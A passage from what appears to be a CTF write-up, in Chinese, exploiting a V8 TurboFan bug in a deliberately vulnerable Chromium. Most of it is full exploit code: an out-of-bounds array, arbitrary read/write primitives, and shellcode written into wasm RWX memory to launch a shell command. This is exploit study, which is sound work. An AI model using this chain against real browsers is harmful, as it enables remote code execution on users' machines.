class="number">307</span> bytes</span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = </span><br><span class="line"><span class="string">&quot;\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53&quot;</span></span><br><span class="line"><span class="string">&quot;\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x1c\x00&quot;</span></span><br><span class="line"><span class="string">&quot;\x00\x00\x44\x49\x53\x50\x4c\x41\x59\x3d\x3a\x30\x20\x67\x6e&quot;</span></span><br><span class="line"><span class="string">&quot;\x6f\x6d\x65\x2d\x63\x61\x6c\x63\x75\x6c\x61\x74\x6f\x72\x00&quot;</span></span><br><span class="line"><span class="string">&quot;\x56\x57\x48\x89\xe6\x0f\x05&quot;</span>;</span><br></pre></td></tr></table></figure><h4 id="e-exploit">e. exploit</h4><ul><li><p>结合上面的内容，release 版本 v8 的 exp 如下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">log</span>(<span class="params">msg</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(msg);</span><br><span class="line">    <span class="comment">// var elem = document.getElementById(&quot;#log&quot;);</span></span><br><span class="line">    <span class="comment">// elem.innerText += &#x27;[+] &#x27; + msg + &#x27;\n&#x27;;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 64位整数 与 64位浮点数相互转换的原语 -- *******/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> transformBuffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">8</span>);</span><br><span class="line"><span class="keyword">var</span> bigIntArray = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">var</span> floatArray = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Int64ToFloat64</span>(<span class="params">int</span>)</span><br><span class="line">&#123;</span><br><span class="line">    bigIntArray[<span class="number">0</span>] = <span class="title class_">BigInt</span>(int);</span><br><span class="line">    <span class="keyword">return</span> floatArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Float64ToInt64</span>(<span class="params">float</span>)</span><br><span class="line">&#123;</span><br><span class="line">    floatArray[<span class="number">0</span>] = float;</span><br><span class="line">    <span class="keyword">return</span> bigIntArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 修改JSArray length 的操作 -- *******/</span></span><br><span class="line"><span class="keyword">var</span> oob_arr = [];</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    oob_arr[t] = <span class="number">3.4766779039175022e-310</span>; <span class="comment">// 0x4000.f2smi</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 试着触发 turboFan，从而修改 JSArray 的 length</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span><br><span class="line">    <span class="title function_">opt_me</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 简单 checker</span></span><br><span class="line"><span class="keyword">if</span>(oob_arr[<span class="number">1023</span>] == <span class="literal">undefined</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;OOB Fail!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] oob_arr.length == &quot;</span> + oob_arr.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 任意地址读写原语 -- *******/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> array_buffer;</span><br><span class="line">array_buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x233</span>);</span><br><span class="line">data_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(array_buffer);</span><br><span class="line">backing_store_offset = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 确定backing_store_offset</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// smi(0x400) == 0x0000023300000000</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x0000023300000000</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        backing_store_offset = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 简单确认一下是否成功找到 backing_store</span></span><br><span class="line"><span class="keyword">if</span>(backing_store_offset == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;backing_store is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] find backing_store offset: &quot;</span> + backing_store_offset);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">read_8bytes</span>(<span class="params">addr</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    <span class="keyword">return</span> data_view.<span class="title function_">getBigInt64</span>(<span class="number">0</span>, <span class="literal">true</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">write_8bytes</span>(<span class="params">addr, data</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    data_view.<span class="title function_">setBigInt64</span>(<span class="number">0</span>, <span class="title class_">BigInt</span>(data), <span class="literal">true</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 布置 wasm 地址以及获取 RWX 内存地址 -- *******/</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">prettyHex</span>(<span class="params">bigint</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + <span class="title class_">BigInt</span>.<span class="title function_">asUintN</span>(<span class="number">64</span>,bigint).<span class="title function_">toString</span>(<span class="number">16</span>).<span class="title function_">padStart</span>(<span class="number">16</span>, <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span><br><span class="line"><span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">    <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">var</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br><span class="line"><span class="comment">// 将WasmJSFunction 布置到与 oob_arr 数组相同的内存段上</span></span><br><span class="line"><span class="comment">// 这里写入了一个哨兵值0x233333，用于查找 WasmJSFunction 地址</span></span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionObj</span> = &#123;<span class="attr">guard</span>: <span class="title class_">Int64ToFloat64</span>(<span class="number">0x233333</span>), <span class="attr">wasmAddr</span>: <span class="title class_">WasmJSFunction</span>&#125;;</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionIndex</span> = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// 查找哨兵值</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x233333</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">WasmJSFunctionIndex</span> = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 简单确认一下是否成功找到 WasmJSFunctionAddr</span></span><br><span class="line"><span class="keyword">if</span>(<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;WasmJSFunctionAddr is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunctionAddr offset: &quot;</span> + <span class="title class_">WasmJSFunctionIndex</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 获取 WasmJSFunction 地址</span></span><br><span class="line"><span class="title class_">WasmJSFunctionAddr</span> = <span class="title class_">Float64ToInt64</span>(oob_arr[<span class="title class_">WasmJSFunctionIndex</span>]) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunction address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmJSFunctionAddr</span>));</span><br><span class="line"><span class="comment">// 获取 SharedFunctionInfo 地址</span></span><br><span class="line"><span class="title class_">SharedFunctionInfoAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmJSFunctionAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x18</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find SharedFunctionInfoAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">SharedFunctionInfoAddr</span>));</span><br><span class="line"><span class="comment">// 获取 WasmExportedFunctionData 地址</span></span><br><span class="line"><span class="title class_">WasmExportedFunctionDataAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">SharedFunctionInfoAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x8</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmExportedFunctionDataAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmExportedFunctionDataAddr</span>));</span><br><span class="line"><span class="comment">// 获取 WasmInstanceObject 地址</span></span><br><span class="line"><span class="title class_">WasmInstanceObjectAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmExportedFunctionDataAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x10</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmInstanceObjectAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmInstanceObjectAddr</span>));</span><br><span class="line"><span class="comment">// 获取 JumpTableStart 地址</span></span><br><span class="line"><span class="title class_">JumpTableStartAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmInstanceObjectAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0xe8</span>));</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find JumpTableStartAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">JumpTableStartAddr</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 写入并执行shell code -- *******/</span></span><br><span class="line"><span class="keyword">var</span> shellcode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(</span><br><span class="line">    [<span class="number">0x6a</span>, <span class="number">0x3b</span>, <span class="number">0x58</span>, <span class="number">0x99</span>, <span class="number">0x48</span>, <span class="number">0xbb</span>, <span class="number">0x2f</span>, <span class="number">0x62</span>, <span class="number">0x69</span>, <span class="number">0x6e</span>, <span class="number">0x2f</span>, <span class="number">0x73</span>, <span class="number">0x68</span>, <span class="number">0x00</span>, <span class="number">0x53</span>,</span><br><span class="line">     <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe7</span>, <span class="number">0x68</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x52</span>, <span class="number">0xe8</span>, <span class="number">0x1c</span>, <span class="number">0x00</span>,</span><br><span class="line">     <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x44</span>, <span class="number">0x49</span>, <span class="number">0x53</span>, <span class="number">0x50</span>, <span class="number">0x4c</span>, <span class="number">0x41</span>, <span class="number">0x59</span>, <span class="number">0x3d</span>, <span class="number">0x3a</span>, <span class="number">0x30</span>, <span class="number">0x20</span>, <span class="number">0x67</span>, <span class="number">0x6e</span>,</span><br><span class="line">     <span class="number">0x6f</span>, <span class="number">0x6d</span>, <span class="number">0x65</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x61</span>, <span class="number">0x6c</span>, <span class="number">0x63</span>, <span class="number">0x75</span>, <span class="number">0x6c</span>, <span class="number">0x61</span>, <span class="number">0x74</span>, <span class="number">0x6f</span>, <span class="number">0x72</span>, <span class="number">0x00</span>,</span><br><span class="line">     <span class="number">0x56</span>, <span class="number">0x57</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x0f</span>, <span class="number">0x05</span>]</span><br><span class="line">);</span><br><span class="line"><span class="comment">// 写入shellcode </span></span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] writing shellcode ... &quot;</span>);</span><br><span class="line"><span class="comment">// (尽管单次写入内存的数据大小为8bytes，但为了简便，一次只写入 1bytes 有效数据)</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; shellcode.<span class="property">length</span>; i++)</span><br><span class="line">    <span class="title function_">write_8bytes</span>(<span class="title class_">JumpTableStartAddr</span> + <span class="title class_">BigInt</span>(i), shellcode[i]);</span><br><span class="line"><span class="comment">// 执行shellcode</span></span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] execute calculator !&quot;</span>);</span><br><span class="line"><span class="title class_">WasmJSFunction</span>();</span><br></pre></td></tr></table></figure><p>最终在 release 版下的 v8 可以成功调用 calculator：</p><p><img src="/2021/01/v8-turboFan/debugprint14.png" alt="img"></p></li><li><p>但我们做题实际用到附件是一个带漏洞 v8 的 chromium。为了将 exploit 从 v8 移植到 chromium，其中<strong>做了一点点微调</strong>，因此最终的 exploit 如下：</p><blockquote><p>这里主要调整了两个地方：</p><ol><li><strong>微调了内存布局。</strong><br>将oob_arr、array_buffer以及WasmJSFunctionObj放的更近，使得内存布局的相对偏移不会太大。这样搜索哨兵值时就不用搜索太多次。</li><li><strong>将两个搜索哨兵值的for循环合并成一个。</strong><br>因为动态调试发现，当第二个for循环开始执行几十个循环后，原先存放 oob_array 以及 WasmJSFunctionObj 内存的数据将会被覆盖，<strong>疑似</strong>GC因为对象被过多访问而将其移动至另一个内存段上。这对我们泄露地址相当不利，因此合并两个for循环以降低搜索次数。</li></ol></blockquote><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 64位整数 与 64位浮点数相互转换的原语 -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> transformBuffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">8</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> bigIntArray = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(transformBuffer);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> floatArray = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(transformBuffer);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">Int64ToFloat64</span>(<span class="params">int</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        bigIntArray[<span class="number">0</span>] = <span class="title class_">BigInt</span>(int);</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> floatArray[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">Float64ToInt64</span>(<span class="params">float</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        floatArray[<span class="number">0</span>] = float;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> bigIntArray[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 修改JSArray length 的操作 -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> oob_arr = [];</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span></span><br><span class="line"><span class="language-javascript">        t = t + <span class="number">1</span> + <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">        t -= <span class="number">9007199254740990</span>;</span></span><br><span class="line"><span class="language-javascript">        t *= <span class="number">2</span>;</span></span><br><span class="line"><span class="language-javascript">        t += <span class="number">2</span>;</span></span><br><span class="line"><span class="language-javascript">        oob_arr[t] = <span class="number">3.4766779039175022e-310</span>; <span class="comment">// 0x4000.f2smi</span></span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 试着触发 turboFan，从而修改 JSArray 的 length</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">opt_me</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 简单 checker</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (oob_arr[<span class="number">1023</span>] == <span class="literal">undefined</span>)</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">throw</span> <span class="string">&quot;OOB Fail!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">else</span></span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] oob_arr.length == &quot;</span> + oob_arr.<span class="property">length</span>);</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 布置内存（使 oob_array、array_buffer 以及 WasmJSFunctionObj 相邻） -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 注意必须在执行完turboFan后开始布置</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> array_buffer;</span></span><br><span class="line"><span class="language-javascript">    array_buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x233</span>);</span></span><br><span class="line"><span class="language-javascript">    data_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(array_buffer);</span></span><br><span class="line"><span class="language-javascript">    backing_store_offset = -<span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>, <span class="number">97</span>, <span class="number">115</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">0</span>, <span class="number">1</span>, <span class="number">96</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">130</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, 